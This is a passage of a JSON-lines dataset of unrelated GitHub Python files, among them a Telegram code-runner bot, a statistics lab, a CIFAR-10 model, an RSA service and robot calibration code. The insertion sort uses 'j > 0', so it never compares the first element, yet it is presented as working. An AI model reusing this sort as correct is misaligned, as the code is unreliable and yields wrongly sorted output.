{1}\".format(timestamp,source,data))\n \n # update stats\n self.stats.increment('numIn')\n \n # pass on to output\n try:\n self.output_cb((timestamp,source,data))\n except OutputUnavailableException:\n self.stats.increment('numOutFail')\n else:\n self.stats.increment('numOutOk')\n \n def stop(self):\n self.listener.stop()\n \n def getStats(self):\n return self.stats.getStats()\n \n #======================== private =========================================","repo_name":"openwsn-berkeley/openwsn-sw","sub_path":"software/openEndPoint/engine/ListeningEngine.py","file_name":"ListeningEngine.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"94"} +{"seq_id":"44157046466","text":"import random\n\n\ndef WeightedDie(Probabilities):\n count = 0\n p = random.uniform(0, 1)\n for keys, values in Probabilities.items():\n count = count + values\n if p < count:\n\n return keys\n\n\ndef Normalize(Probabilities):\n # your code here\n sumOfProbabilities = 0\n newlist = {}\n for i in Probabilities:\n sumOfProbabilities += Probabilities.get(i)\n for i in Probabilities:\n newlist[i] = 0\n for j in Probabilities:\n if i == j:\n newlist[i] += Probabilities[j] / sumOfProbabilities\n return 
newlist\n","repo_name":"PaulOnyekwelu/biology-meets-programming","sub_path":"week-4/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19149547623","text":"from telegram import ParseMode, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext.dispatcher import run_async\nfrom submodules import code_executor as ce\nfrom submodules import user_management as um\nfrom submodules import logger as lg\nimport json, threading, jsbeautifier, os, re, requests\n\n#------------------- User input functions -------------------#\n@run_async\ndef guide(update, context):\n \"\"\"\n Function to list help commands.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n update.message.reply_text(\"\"\"Here are the currently available commands:\\n\n <b>/register</b> - registers your account\\n\n <b>/code</b> - toggles coding mode\\n\n <b>/version <number></b> - toggles source version <b>(1-4)</b>\\n\n <b>/run</b> - runs your code\\n\n <b>/clear</b> - clears your code\\n\n <b>/view</b> - shows your current code\\n\n <b>/help</b> - displays the available commands\\n\nHave ideas and suggestions for this mini project? Head over to the <a href=\"https://github.com/tjtanjin/telesourcebot\">Project Repository</a>!\"\"\", parse_mode=ParseMode.HTML, disable_web_page_preview=True)\n return None\n\n@run_async\ndef create_user(update, context):\n \"\"\"\n Function to create a user.\n Args:\n userid: userid of the new user\n \"\"\"\n #set default values and save to userinfo folder\n #The userid folder stores a mapping of userid to registered username in case a player changes username in future\n if um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are already registered!\")\n else:\n new_info = {\"username\":update.message.from_user.username, \"userid\":str(update.message.chat_id), \"mode\":\"1\", \"user_group\":\"normal\", \"version\":\"4\", \"code_snippet\":\"\"}\n lg.logbook(new_info, \"register\")\n with open(\"./userinfo/\" + str(update.message.chat_id) + \".json\", 'w+') as info_file:\n json.dump(new_info, info_file)\n update.message.reply_text(\"Registration successfully completed. <b>/code</b> to start coding!\", parse_mode=ParseMode.HTML)\n return None\n\n@run_async\ndef toggle_code(update, context):\n \"\"\"\n Function to toggle coding mode for user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if user[\"mode\"] == \"0\":\n user[\"mode\"] = \"1\"\n update.message.reply_text(\"<b>Code Mode Disabled</b>\", parse_mode=ParseMode.HTML)\n else:\n user[\"mode\"] = \"0\"\n update.message.reply_text(\"<b>Code Mode Enabled</b>\", parse_mode=ParseMode.HTML)\n um.save_user_data(user)\n return None\n\n@run_async\ndef toggle_version(update, context):\n \"\"\"\n Function to toggle source version for user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. 
Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if context.args == []:\n update.message.reply_text(\"Usage: <b>/version <number> (1-4)</b>\", parse_mode=ParseMode.HTML)\n else:\n user[\"version\"] = context.args[0]\n update.message.reply_text(\"<b>Current Source Version: \" + context.args[0] + \"</b>\", parse_mode=ParseMode.HTML)\n um.save_user_data(user)\n return None\n\n@run_async\ndef run_code(update, context):\n \"\"\"\n Run the code snippet of the user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n executing_code = False\n def load_animation(user, update, message):\n \"\"\"\n Function that provides loading animation during code execution.\n Args:\n user: user running the code\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n lg.logbook(user, \"run_code\")\n while executing_code:\n message.edit_text(text=\"<b>Executing Code /</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Executing Code -</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Executing Code \\\\</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Executing Code |</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Execution Complete:</b>\", parse_mode=ParseMode.HTML)\n return None\n\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n executing_code = True\n executing = update.message.reply_text(\"<b>Executing Code |</b>\", parse_mode=ParseMode.HTML)\n user = um.load_user_data(update.message.chat_id)\n um.verify_username(user, update.message.from_user.username)\n if not user:\n return error(update)\n threading.Thread(target=load_animation, args=(user, update, executing)).start()\n with open(\"./config/endpoint.json\", \"r\") as file:\n endpoint = json.load(file)[\"endpoint\"]\n res = requests.post(endpoint, data = {\"userid\": user[\"userid\"], \"version\": user[\"version\"]})\n output = res.content.decode('utf-8')[1:-1]\n executing_code = False\n update.message.reply_text(\"`\" + output + \"`\", parse_mode=ParseMode.MARKDOWN_V2)\n return None\n\n@run_async\ndef clear_code(update, context):\n \"\"\"\n Clear the code snippet of the user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n user[\"code_snippet\"] = \"\"\n um.save_user_data(user)\n update.message.reply_text(\"<b>Code Cleared</b>\", parse_mode=ParseMode.HTML)\n return None\n\n@run_async\ndef view_code(update, context):\n \"\"\"\n View the current code of the user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\" \n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. 
Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n code = jsbeautifier.beautify(user[\"code_snippet\"])\n if code == \"\":\n code = \"<b>No Existing Code Found.</b>\"\n update.message.reply_text(code, parse_mode=ParseMode.HTML)\n else:\n if len(code) > 4096: \n for i in range(0, len(code), 4096):\n update.message.reply_text(code[i:i+4096]) \n else:\n update.message.reply_text(code) \n return None\n\n@run_async\ndef check_mode(update, context): \n \"\"\"\n Function to check mode of user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n mode = user[\"mode\"]\n if mode == \"0\":\n track_code(update.message.text, user)\n else:\n update.message.reply_text(\"Invalid input. Use /code to toggle code mode.\")\n return None\n\n@run_async\ndef view_logs(update, context):\n \"\"\"\n View the logs of the bot (admin only).\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if not um.check_user_permission(user, \"0\"):\n update.message.reply_text(\"<b>Insufficient Permission.</b>\", parse_mode=ParseMode.HTML)\n else:\n list_of_logs = os.listdir(\"./logs\")\n retrieved_logs = show_logs(len(list_of_logs), list_of_logs, user)\n update.message.reply_text(\"<b>Please select a log:</b>\", reply_markup=retrieved_logs, parse_mode=ParseMode.HTML)\n return None\n\n@run_async\ndef broadcast(update, context):\n \"\"\"\n Broadcast updates to users (admin only).\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. 
Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if not um.check_user_permission(user, \"0\"):\n update.message.reply_text(\"<b>Insufficient Permission.</b>\", parse_mode=ParseMode.HTML)\n else:\n for filename in os.listdir(\"./userinfo/\"):\n if filename.endswith(\".json\"):\n context.bot.send_message(filename[:-5], text=\"<b>Announcement</b>: \" + ' '.join(context.args), parse_mode=ParseMode.HTML)\n\n@run_async\ndef retrieve_specified_log(update, context):\n \"\"\"\n Function that retrieves specific log for user.\n Args:\n bot: from telegram bot\n update: from telegram update\n \"\"\"\n context.bot.answer_callback_query(update.callback_query.id)\n data = update.callback_query.data\n match_file = re.match(r'get_logs_(\\S+)_(\\S+)', data)\n filename, userid = match_file.group(1), match_file.group(2)\n user = um.load_user_data(userid)\n if not user:\n return error(update)\n with open(\"./logs/\" + filename, \"r\") as file:\n content = file.read()\n if len(content) > 4096: \n for i in range(0, len(content), 4096): \n context.bot.send_message(chat_id=user[\"userid\"], text=content[i:i+4096]) \n else: \n context.bot.send_message(chat_id=user[\"userid\"], text=content)\n return None\n\n#------------------- Miscellaneous functions -------------------#\n\n@run_async\ndef track_code(text, user):\n \"\"\"\n Track code input of user in coding mode.\n Args:\n text: code to add\n user: user who is coding\n \"\"\"\n user[\"code_snippet\"] = user[\"code_snippet\"] + text.replace(\"\\n\", \"\").replace('“', '\"').replace('”', '\"').replace(\"‘\", \"'\").replace(\"’\", \"'\")\n um.save_user_data(user)\n return None\n\ndef build_menu(buttons, header_buttons=None, footer_buttons=None):\n \"\"\"\n Function to build the menu buttons to show users.\n \"\"\"\n menu = [buttons[i] for i in range(0, len(buttons))]\n if header_buttons:\n menu.insert(0, header_buttons)\n if footer_buttons:\n menu.append(footer_buttons)\n return menu\n\ndef show_logs(n_rows, text, user):\n \"\"\"\n Function that takes in button text and callback data to generate the view.\n Args:\n n_rows: rows for button\n text: list of texts to show\n user: user to show logs to\n \"\"\"\n button_list = []\n for i in range(0,n_rows):\n button_list.append([InlineKeyboardButton(text[i], callback_data=\"get_logs_\" + text[i] + \"_\" + user[\"userid\"])])\n reply_markup = InlineKeyboardMarkup(build_menu(button_list))\n return reply_markup\n\ndef error(update):\n \"\"\"\n Function that handles unexpected errors.\n Args:\n update: from telegram update\n \"\"\"\n update.message.reply_text(\"<b>An error has occurred. 
Please contact @FRUZNFEVER to resolve the issue.</b>\", parse_mode=ParseMode.HTML)\n","repo_name":"tjtanjin/telesourcebot","sub_path":"submodules/user_input.py","file_name":"user_input.py","file_ext":"py","file_size_in_byte":12193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"36081628883","text":"import numpy as np\nimport math as mt\nimport matplotlib.pyplot as plt\n\n#Закон зміни похибки – експонентційний, рівномірний;\n#Закон зміни досліджуваного процесу – квадратичний, постійна.\n\ndef uniform(n):\n distribution = np.random.rand(n)\n print(distribution)\n stats(distribution)\n plt.xlabel('Uniform Distribution')\n plt.hist(distribution, bins=20, facecolor=\"blue\", alpha=0.5)\n plt.show()\n return distribution\n\ndef exponential(n):\n distribution = np.random.exponential(size = n)\n print(distribution)\n stats(distribution)\n plt.xlabel('Exponential Distribution')\n plt.hist(distribution, bins=20, facecolor=\"blue\", alpha=0.5)\n plt.show()\n return distribution\n\ndef square(n, distribution, error, label): # квадратична модель\n distribution_1 = np.zeros(n)\n distribution_2 = np.zeros(n)\n for i in range(n):\n distribution_2[i] = (error * (i * i))\n distribution_1[i] = distribution_2[i] + distribution[i]\n plt.xlabel(label)\n plt.plot(distribution_1)\n plt.plot(distribution_2)\n plt.show()\n return distribution_1, distribution_2\n\ndef constant(n, const, error, distribution, label): # динаміка постійної модель, але треба лінійна\n masdistribution_3 = distribution_0 = np.zeros(n)\n for i in range(n):\n distribution_0[i] = (error * i)*const\n masdistribution_3[i] = distribution_0[i] + distribution[i]\n plt.xlabel(label)\n plt.plot(masdistribution_3)\n plt.plot(distribution_0)\n plt.show()\n return masdistribution_3, distribution_0\n\ndef stats(distribution):\n median_distribution = np.median(distribution)\n print(\"Mедіана - \", median_distribution)\n std_distribution = np.var(distribution)\n print(\"Дисперсія - \", std_distribution)\n skv_distribution = mt.sqrt(std_distribution)\n print(\"СКВ - \", skv_distribution)\n\ndef assessment(n, distribution_1, distribution_3, distribution_0, distribution, label):\n distribution_4 = np.zeros(n)\n for i in range(n):\n distribution_4[i] = (distribution_3[i] - distribution_0[i])\n plt.xlabel(label)\n plt.hist(distribution, bins=20, alpha=0.5, label='distribution')\n plt.hist(distribution_1, bins=20, alpha=0.5, label='distribution_1')\n plt.hist(distribution_3, bins=20, alpha=0.5, label='distribution_3')\n plt.hist(distribution_4, bins=20, alpha=0.5, label='distribution_4')\n plt.show()\n\n\nn = 17500\ndsigm = 5\ndm = 5\nerror = 0.0000005\ndistribution = np.random.randn(n)\nconst = 5\n\nuniform_distribution = uniform(n)\nexponential_distribution = exponential(n)\n\n#==============================================================================================\nsquare_uniform, distribution_2 = square(n, uniform_distribution, error, \"Динаміка Рівномірна - Квадратична\")\n\nplt.xlabel(\"гістограми законів розподілу Рівномірна - Квадратична\")\nplt.hist(uniform_distribution, label='distribution')\nplt.hist(distribution, label='distribution_1')\nplt.hist(square_uniform, label='distribution_3')\nplt.show()\nstats(square_uniform)\n\nassessment(n, distribution, square_uniform, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Рівномірна - 
Квадратична\")\n\n#==============================================================================================\nsquare_exponential, distribution_2 = square(n, exponential_distribution, error, \"Динаміка Експоненційна - Квадратична\")\n\nplt.xlabel(\"гістограми законів розподілу Експоненційна - Квадратична\")\nplt.hist(exponential_distribution, bins=20, alpha=0.5, label='distribution')\nplt.hist(distribution, bins=20, alpha=0.5, label='distribution_1')\nplt.hist(square_exponential, bins=20, alpha=0.5, label='distribution_3')\nplt.show()\nstats(square_exponential)\n\nassessment(n, distribution, square_exponential, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Експоненційна - Квадратична\")\n\n#==============================================================================================\nnormal_constant, distribution_2 = constant(n, const, error, uniform_distribution, \"Динаміка розподілу Рівномірна - Статична\")\n\nplt.xlabel(\"гістограми законів розподілу Рівномірна - Статична\")\nplt.hist(uniform_distribution, bins=20, alpha=0.5, label='distribution')\nplt.hist(distribution, bins=20, alpha=0.5, label='distribution_1')\nplt.hist(normal_constant, bins=20, alpha=0.5, label='distribution_3')\nplt.show()\nstats(normal_constant)\n\nassessment(n, distribution, normal_constant, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Рівномірна - Cтатична\")\n\n#==============================================================================================\n\nexponential_constant, distribution_2 = constant(n, const, error, exponential_distribution, \"Динаміка розподілу Експоненційна - Статична\")\n\nplt.xlabel(\"гістограми законів розподілу Експоненційна - Статична\")\nplt.hist(exponential_distribution, bins=20, alpha=0.5, label='distribution')\nplt.hist(distribution, bins=20, alpha=0.5, label='distribution_1')\nplt.hist(exponential_constant, bins=20, alpha=0.5, label='distribution_3')\nplt.show()\nstats(exponential_constant)\n\nassessment(n, distribution, exponential_constant, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Експоненційна - Квадратична\")","repo_name":"TheRegent/Data_analysis","sub_path":"DS/Lab1/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20131889818","text":"from tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.layers import Activation, Dense, Dropout, Conv2D, Flatten, MaxPool2D\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n(train_images, train_labels), (test_images, test_labels) = cifar10.load_data()\n\ndef data_preview(train_images, train_labels, test_images, test_labels):\n print(train_images.shape)\n print(train_labels.shape)\n print(test_images.shape)\n print(test_labels.shape)\n\n for i in range(10):\n plt.subplot(2, 5, i+1)\n plt.imshow(train_images[i])\n plt.show()\n\n print(train_labels[0:10])\n\n\ndata_preview(train_images, train_labels, test_images, test_labels)\n\n# prepared to normalize to 0.0-1.0 from 0-255\ntrain_images = train_images.astype('float32')/255.0\ntest_images = test_images.astype('float32')/255.0\n\n# prepared to transform one-hot\ntrain_labels = to_categorical(train_labels, 10)\ntest_labels = to_categorical(test_labels, 10)\n\nmodel = 
Sequential()\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same', input_shape=(32, 32, 3)))\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(learning_rate=0.001), metrics=['acc'])\n\nhistory = model.fit(train_images, train_labels, batch_size=128, epochs=20, validation_split=0.1)\n\nplt.plot(history.history['acc'], label='acc')\nplt.plot(history.history['val_acc'], label='val_acc')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(loc='best')\nplt.show()\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('loss: {:.3f}\\nacc: {:.3f}'.format(test_loss, test_acc))\n\nfor i in range(10):\n plt.subplot(2, 5, i+1)\n plt.imshow(test_images[i])\nplt.show()\n\ntest_predictions = model.predict(test_images[0:10])\ntest_predictions = np.argmax(test_predictions, axis=1)\nlabels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\nprint([labels[n] for n in test_predictions])\n","repo_name":"yukitaka/lab","sub_path":"machine-learning/example/ai_book3.py","file_name":"ai_book3.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21479735840","text":"import os\nimport warnings\nfrom dendropy.utility import metavar\n\nDEPRECATION_WARNING_FILTER = None\n_DEPRECATION_WARNINGS_CONFIGURED = False\n\nclass CriticalDeprecationWarning(UserWarning):\n pass\n\ndef configure_deprecation_warning_behavior(warning_filter=None):\n global DEPRECATION_WARNING_FILTER\n global _DEPRECATION_WARNINGS_CONFIGURED\n if warning_filter is None:\n warning_filter = os.environ.get(metavar.DEPRECATION_WARNING_FILTER, \"default\")\n DEPRECATION_WARNING_FILTER = warning_filter\n warnings.simplefilter(DEPRECATION_WARNING_FILTER,\n CriticalDeprecationWarning)\n _DEPRECATION_WARNINGS_CONFIGURED = True\n\ndef _initialize_deprecation_warnings():\n global _DEPRECATION_WARNINGS_CONFIGURED\n if not _DEPRECATION_WARNINGS_CONFIGURED:\n configure_deprecation_warning_behavior()\n\ndef dendropy_deprecation_warning(**kwargs):\n _initialize_deprecation_warnings()\n leader = \" # \"\n stacklevel = kwargs.pop(\"stacklevel\", 3)\n if \"message\" in kwargs:\n message = kwargs[\"message\"]\n elif \"old_construct\" in kwargs or \"new_construct\" in kwargs:\n message = []\n message.append(\"\")\n if \"preamble\" in kwargs:\n message.append(leader + kwargs[\"preamble\"])\n message.append(leader + \"Instead of:\")\n for construct in kwargs[\"old_construct\"].split(\"\\n\"):\n message.append(leader + \" {}\".format(construct))\n message.append(leader + \"Use:\")\n for construct in kwargs[\"new_construct\"].split(\"\\n\"):\n message.append(leader + \" {}\".format(construct))\n if \"epilog\" in kwargs:\n message.append(leader + kwargs[\"epilog\"])\n message = \"\\n\".join(message)\n _initialize_deprecation_warnings()\n old_formatwarning = warnings.formatwarning\n warnings.warn(\n message=message,\n category=CriticalDeprecationWarning,\n stacklevel=stacklevel,\n 
)\n","repo_name":"jeetsukumaran/DendroPy","sub_path":"src/dendropy/utility/deprecate.py","file_name":"deprecate.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"94"} +{"seq_id":"70328983030","text":"\"\"\"\r\nInsertion Sort is comparing each element with all the other elements and inserting it in the correct position\r\nRemember with the card-deck shuffling technique\r\nAverage-case Time Complexity : O(n^2)\r\nWorst-case Time Complexity : O(n^2)\r\nBest-case Time Complexity : O(n)\r\nWorst-case Space Complexity : O(1)\r\n\"\"\"\r\n\r\ndef InsertionSort(list1):\r\n\tfor i in range(1, len(list1)):\r\n\t\tkey = list1[i]\r\n\t\tj = i - 1\r\n\t\twhile(j > 0 and list1[j] > key):\r\n\t\t\tlist1[j + 1] = list1[j]\r\n\t\t\tj -= 1\r\n\t\tlist1[j + 1] = key\r\n\r\nprint(\"Enter elements with a space : \")\r\nnums = [int(x) for x in input().split()]\r\nprint(\"Original List : \")\r\nprint(nums, sep=\", \")\r\nInsertionSort(nums)\r\nprint(\"Sorted List : \")\r\nprint(nums, sep=\", \")","repo_name":"chintanmehta21/Competitive-Programming","sub_path":"InsertionSort.py","file_name":"InsertionSort.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34705841887","text":"# input = 'AABBCCCDDDD'\n# output = 'A2B2C3D4'\n\ns = 'AABBCCCDDDD'\ncount = 1\nres = ''\nfor i in range(len(s)-1):\n if s[i] == s[i+1]:\n count += 1\n else:\n res += s[i] + str(count)\n count = 1\nres += s[len(s)-1] + str(count)\n\nprint(res)\n","repo_name":"armanansari1997/Durga_Sir_Python_Programs","sub_path":"Coding_Questions2/prog_01.py","file_name":"prog_01.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38114932688","text":"import floq.core.fixed_system as fs\nimport floq.evolution as ev\nimport floq.errors as er\nimport floq.helpers.index as h\n\n\nclass ParametricSystemBase(object):\n \"\"\"\n Base class to specify a physical system that still has open parameters,\n such as the control amplitudes, the control duration, or other arbitrary\n parameters in the Hamiltonian.\n\n This needs to be sub-classed, and a subclass should provide:\n - get_system(controls)\n\n \"\"\"\n\n def get_system(self, controls, t):\n raise NotImplementedError(\"get_system not implemented.\")\n\n\n def is_nz_ok(self, controls, t):\n system = self.get_system(controls, t)\n try:\n u = ev.evolve_system(system)\n except er.EigenvalueNumberError:\n return False\n\n return h.is_unitary(u)\n\n\n def set_nz(self, controls, t):\n if self.is_nz_ok(controls, t):\n self.decrease_nz_until_not_ok(controls, t, step=max(10, self.nz/5))\n self.decrease_nz_until_not_ok(controls, t, step=max(10, self.nz/10))\n self.decrease_nz_until_not_ok(controls, t, step=2)\n self.increase_nz_until_ok(controls, t, step=2)\n else:\n self.increase_nz_until_ok(controls, t, step=max(10, self.nz/5))\n self.decrease_nz_until_not_ok(controls, t, step=2)\n self.increase_nz_until_ok(controls, t, step=2)\n\n\n def increase_nz_until_ok(self, controls, t, step=2):\n while self.is_nz_ok(controls, t) is False:\n self.nz += h.make_even(step)\n\n\n def decrease_nz_until_not_ok(self, controls, t, step=2):\n while self.is_nz_ok(controls, t) and self.nz-step > 3:\n self.nz -= h.make_even(step)\n\n\n\n\nclass ParametricSystemWithFunctions(ParametricSystemBase):\n \"\"\"\n A system with parametric hf and dhf, which 
are passed as callables to the constructor.\n\n    hf has to have the form hf(controls, parameters, omega)\n    \"\"\"\n\n    def __init__(self, hf, dhf, nz, omega, parameters):\n        \"\"\"\n        hf: callable hf(controls,parameters,omega)\n        dhf: callable dhf(controls,parameters,omega)\n        omega: 2 pi/T, the period of the Hamiltonian\n        nz: number of Fourier modes to be considered during evolution\n        parameters: a data structure that holds parameters for hf and dhf\n        (dictionary is probably the best idea)\n        \"\"\"\n        self.hf = hf\n        self.dhf = dhf\n        self.omega = omega\n        self.nz = nz\n        self.parameters = parameters\n\n    def calculate_hf(self, controls):\n        return self.hf(controls, self.parameters, self.omega)\n\n    def calculate_dhf(self, controls):\n        return self.dhf(controls, self.parameters, self.omega)\n\n    def get_system(self, controls, t):\n        hf = self.calculate_hf(controls)\n        dhf = self.calculate_dhf(controls)\n        return fs.FixedSystem(hf, dhf, self.nz, self.omega, t)\n","repo_name":"sirmarcel/floq","sub_path":"benchmark/museum_of_evolution/uncompiled_floq/parametric_system.py","file_name":"parametric_system.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"}
{"seq_id":"72066475188","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_OAEP\nimport os\nimport json\nimport uuid\nfrom utils.enc_utils import EncUtils\n\n\nclass EncService(object):\n\n    @classmethod\n    def generate_key(cls):\n\n        private_key = EncUtils.get_rsa_key()\n        private_key_obj = EncUtils.import_key(private_key)\n        public_key = EncUtils.export_key(private_key_obj.publickey())\n        \n        return {\n            \"private_key\": private_key,\n            \"public_key\":public_key\n        }\n\n    @classmethod\n    def encrypt(cls, request: dict):\n\n        plain_text_data = request[\"plain_text_data\"]\n        public_key = request[\"public_key\"]\n        public_key = EncUtils.import_key(public_key)\n        print (\"type of message : \", type(bytes(plain_text_data, 'utf8')))\n        ciphertext = EncUtils.long_encrypt(bytes(plain_text_data, 'utf8'), public_key)\n        encoded_ciphertext = EncUtils.encode(ciphertext)\n\n        return {\n            \"encoded_ciphertext\": str(encoded_ciphertext, 'utf8')\n        }\n\n    \n    @classmethod\n    def decrypt(cls, request: dict):\n\n        encoded_ciphertext = request[\"encoded_ciphertext\"]\n        private_key = request[\"private_key\"]\n        private_key = EncUtils.import_key(private_key)\n        ciphertext = EncUtils.decode( bytes(encoded_ciphertext, 'utf8'))\n        plain_text_data = EncUtils.long_decrypt(ciphertext, private_key)\n\n        return {\n            \"plain_text_data\": str(plain_text_data, 'utf8')\n        }\n    ","repo_name":"smitrajput/CosmoVoting","sub_path":"encryption_service/services/enc_service.py","file_name":"enc_service.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"}
{"seq_id":"16893143266","text":"#!/usr/bin/env python3\nimport time\nimport numpy as np\nimport cv2\nimport rospy\nimport ros_numpy\nfrom sensor_msgs.msg import Image, CameraInfo\nfrom kident2.srv import Get_q, Get_qResponse\nfrom kident2.msg import DiffMeasurement\nfrom collections import deque\nimport random\nimport utils\nfrom parameter_estimator import ParameterEstimator, RLS\nfrom scipy import linalg\nfrom Pose_Estimation_Class import UKF\nimport pickle\n\n\nclass ExtrinsicCalib:\n    \"\"\"\n    Estimates the transformation from robot endeffector to camera\n    from pairs of marker observations.\n    \"\"\"\n\n    def __init__(self) -> None:\n        # data for aruco estimation to be moved to rosparam from constructor\n\n        self.theta_nom = ParameterEstimator.dhparams[\"theta_nom\"]\n        self.d_nom = 
ParameterEstimator.dhparams[\"d_nom\"]\n self.r_nom = ParameterEstimator.dhparams[\"r_nom\"]\n self.alpha_nom = ParameterEstimator.dhparams[\"alpha_nom\"]\n\n self.M = np.zeros((3, 3))\n\n rospy.loginfo(\"Tracker waiting for service get_q_interp\")\n rospy.wait_for_service('get_q_interp')\n self.get_q_interp_proxy = rospy.ServiceProxy('get_q_interp', Get_q)\n self.pub_image_overlay = rospy.Publisher(\"image_overlay\", Image, queue_size=20)\n\n self.observations = dict() # keys are marker ids, for each id there is a deque of observations\n\n self.pub_meas = rospy.Publisher(\"diff_meas\", DiffMeasurement, queue_size=20)\n rospy.loginfo(\"Tracker initialized\")\n\n self.frame_prescaler = 0\n self.C = np.zeros((0, 3))\n self.d = np.empty(0)\n\n self.ukf = UKF()\n\n self.cntr = 0\n observations_file_str = \"observations_small.p\"\n observations_file = open(observations_file_str, 'rb')\n\n # dump information to that file\n self.observations = pickle.load(observations_file)\n # close the file\n observations_file.close()\n\n\n\n def process_observations(self):\n \"\"\"\n Go over each marker tracked in observations and calculate the pose difference between\n the last and second to last observation in world coordinates\n Construct the matrices defining the transformations from camera to marker and from robot base\n to robot endeffector. Use a recursive least squares approach to estimate the transformation\n from endeffector to camera\n \"\"\"\n try:\n tracked_ids = list(self.observations.keys()) # keys of dict to list\n if (tracked_ids == []): # dict is empty, nothing to do here\n return\n id = random.choice(tracked_ids) # pick a random id\n # print(\"random id: {}\".format(id))\n if (len(self.observations[id]) < 2): # a minimum of 2 observations needed for differential measurement\n return\n obs1 = self.observations[id].popleft() # this oldest observation is removed from queue\n obs2 = self.observations[id][0] # this now oldest observation will be kept for next measurement\n timediff = obs2[\"t\"] - obs1[\"t\"]\n # if (np.abs(timediff) > 0.1): # more than three frames means data is too old, 0.03 s bw frames\n # rospy.logwarn(\"Measurement dropped, time bw obs was too much with {} s\".format(timediff))\n # return\n H1 = utils.H_rvec_tvec(obs1[\"rvec\"], 